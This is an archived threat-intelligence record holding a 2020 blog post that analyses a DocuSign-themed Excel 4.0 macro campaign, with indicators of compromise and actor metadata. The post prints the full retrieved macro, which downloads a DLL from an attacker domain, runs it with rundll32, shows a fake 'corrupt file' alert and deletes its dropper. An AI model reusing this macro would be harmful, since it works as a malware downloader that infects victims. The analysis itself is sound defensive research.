{
	"id": "55161579-fd5d-4648-83ff-149ea2b8ae4a",
	"created_at": "2026-04-06T00:14:10.160015Z",
	"updated_at": "2026-04-10T13:13:07.594386Z",
	"deleted_at": null,
	"sha1_hash": "a9cbddb3fdaa1f1ddc56f274b3b490e14a1593b6",
	"title": "Yet Another Active Email Campaign With Malicious Excel Files Identified",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 588664,
	"plain_text": "Yet Another Active Email Campaign With Malicious Excel Files Identified\r\nPublished: 2020-03-13 · Archived: 2026-04-05 17:04:59 UTC\r\nWe identified a potential campaign in preparation where the victim would receive a zip file containing a malicious Excel file embedding Excel 4.0 macros, requiring user interaction to infect the victim. We believe this is the same group as the one we discussed in February, due to the high similarities in the modus operandi. This time again, the downloaded DLL would run calc.exe…\r\nDue to the focus on running the Windows Calculator (calc.exe) by the group, which seems to be preparing a campaign, we decided to call this group the CALCGANG. The new stage of this campaign seems to have started on March 5, 2020.\r\nhttps://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/\r\nPage 1 of 6\r\n\r\nMalicious Excel File Impersonating DocuSign\r\nThe chain works as follows:\r\nThe victim receives a compressed archive (.xls.zip) file.\r\nOnce opened, the .xls file asks the user to enable macros to allow the document to connect to a remote server and send a web request that returns the malicious macros to be executed. This is quite ingenious, as it gives the attacker some degree of flexibility, but it also evades traditional detection, since the malicious macros are not inside the file itself.\r\nThe document pretends to be a DocuSign image.\r\nThe malicious macro downloads a DLL, which gets executed with regsvr32.\r\nWeirdly enough, the DLL that gets downloaded is a 32-bit DLL which spawns the Windows Calculator application via __spawnvpe().\r\nThe sample in question was not present on VirusTotal.\r\nWe found that the distributing domains are hosted on Alibaba Cloud. Details are provided at the end of the blog post. New domains were registered on March 5, 2020.\r\n\r\nWeb Query Dynamically Retrieving the DLL\r\nOnce the Web Query gets executed, the following macro is returned to be executed by Microsoft Excel. Unlike the February version, this one seems slightly more complicated, but it works the same way.\r\n=FOPEN(R[8]C[-2],3)\r\n=FWRITELN(R[-1]C,\"Dim WinHttpReq , oStream\")\r\n=FWRITELN(R[-2]C,\"Set WinHttpReq = CreateObject(\"\"MSXML2.ServerXMLHTTP.6.0\"\")\")\r\n=FWRITELN(R[-3]C,\"WinHttpReq.setOption(2) = 13056\")\r\n=FWRITELN(R[-4]C,\"WinHttpReq.Open \"\"GET\"\", \"\"https://pjtcdnrd.pw/DVnsdvisdv\"\", False\")\r\n=FWRITELN(R[-5]C,\"WinHttpReq.setRequestHeader \"\"User-Agent\"\", \"\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.\r\n=FWRITELN(R[-6]C,\"WinHttpReq.Send\")\r\n=FWRITELN(R[-7]C,\"If WinHttpReq.Status = 200 Then\")\r\n=FWRITELN(R[-8]C,\"Set oStream = CreateObject(\"\"ADODB.Stream\"\")\")\r\n=FWRITELN(R[-9]C,\"oStream.Open\")\r\n=FWRITELN(R[-10]C,\"oStream.Type = 1\")\r\n=FWRITELN(R[-11]C,\"oStream.Write WinHttpReq.ResponseBody\")\r\n=FWRITELN(R[-12]C,\"oStream.SaveToFile \"\"\"\u0026R[-5]C[-2]\u0026\"\"\", 2\")\r\n=FWRITELN(R[-13]C,\"oStream.Close\")\r\n=FWRITELN(R[-14]C,\"End If\")\r\n=FCLOSE(R[-15]C)\r\n=EXEC(\"explorer.exe \"\u0026R[-8]C[-2]\u0026\"\")\r\n=WAIT(NOW()+\"00:00:05\")\r\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\r\n=FOPEN(R[-10]C[-2],3)\r\n=FWRITELN(R[-1]C,\"Set obj = GetObject(\"\"new:C08AFD90-F2A1-11D1-8455-00A0C91F3880\"\")\")\r\n=FWRITELN(R[-2]C,\"obj.Document.Application.ShellExecute \"\"rundll32.exe\"\",\"\" \"\u0026R[-14]C[-2]\u0026\",DllRegisterServer\"\",\r\n=FCLOSE(R[-3]C)\r\n=EXEC(\"explorer.exe \"\u0026R[-14]C[-2]\u0026\"\")\r\n=FILE.DELETE(R[-16]C[-2])\r\n=CLOSE(FALSE)\r\nMalicious Macro Code\r\nIt is unclear at this point if the attackers are just doing some scoping \u0026 testing for an upcoming campaign.\r\n\r\nMalicious DLL executing __spawnvpe(calc)\r\nRSDS Section\r\nThe original DLL name appears to be calc.dll, according to the PDB debugging path string C:\\Cigital\\Tools\\calc_security_poc\\dll\\dll\\Release\\calc.pdb\r\nThe DLL code looks very similar to another DLL available on GitHub. Just like last month, it seems that the CALCGANG loves to use publicly available examples for their tests.\r\nThis could mean that the attackers are in training and learning how to spam and infect victims, or that those servers will be rotated with more malicious content. It is also unclear if this campaign is connected to Dudear.\r\n\r\nVirusTotal and the DLL\r\nDetection on VirusTotal is still pretty low (non-existent) at the time of writing this article.\r\nAt the time of writing this article, another security researcher also noticed that the CALCGANG started to use DocuSign for their documents:\r\nAnother interesting fact is that several files containing the domain name seem to have been dropped in CrowdStrike Falcon Sandbox (Hybrid Analysis) since the creation of the domain name, but they do not seem to be detected at all by any vendor.\r\n\r\nKey Recommendations:\r\nDo not enable macros on files from unknown senders.\r\nAlways be suspicious of legacy Office files such as .XLS, .DOC or .RTF.\r\nMake sure to have memory analysis as part of your incident response strategy to detect and assess potential infections on hosts. We can help you with our automated platform and utilities.\r\nConsider using Application Guard for Microsoft Office.\r\nFollow us on Twitter / LinkedIn to stay informed about emerging campaigns and techniques.\r\n\r\nIndicators of compromise (IoC):\r\nExcel File Hashes:\r\n9E730ACE03BB5A2C18A3EDD25E31C1FAFA02F751A06A467E13C778F2632C4771\r\nB62CC06350B71F22363E2A7AC0A1E8389CA39DF08C60A41E27D60124D24EE2A1\r\nAdditional hashes from Hybrid Analysis:\r\nMalicious DLL:\r\nC25812F5C1B6F74EC686A928461601C305DA29E6C36BBDCE0637CC44D30F2C19\r\nDomain Names \u0026 Servers:\r\nThe domains share a common IP address and are hosted in Alibaba Cloud.\r\npjtcdnrd.pw (Registered On 2020-03-05)\r\n161.117.177.248\r\nSource: https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/"
	],
	"report_names": [
		"2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified"
	],
	"threat_actors": [
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3",
			"created_at": "2023-01-06T13:46:38.860754Z",
			"updated_at": "2026-04-10T02:00:03.125179Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"SectorJ04",
				"SectorJ04 Group",
				"ATK103",
				"GRACEFUL SPIDER",
				"GOLD TAHOE",
				"Dudear",
				"G0092",
				"Hive0065",
				"CHIMBORAZO",
				"Spandex Tempest"
			],
			"source_name": "MISPGALAXY:TA505",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434450,
	"ts_updated_at": 1775826787,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a9cbddb3fdaa1f1ddc56f274b3b490e14a1593b6.pdf",
		"text": "https://archive.orkl.eu/a9cbddb3fdaa1f1ddc56f274b3b490e14a1593b6.txt",
		"img": "https://archive.orkl.eu/a9cbddb3fdaa1f1ddc56f274b3b490e14a1593b6.jpg"
	}
}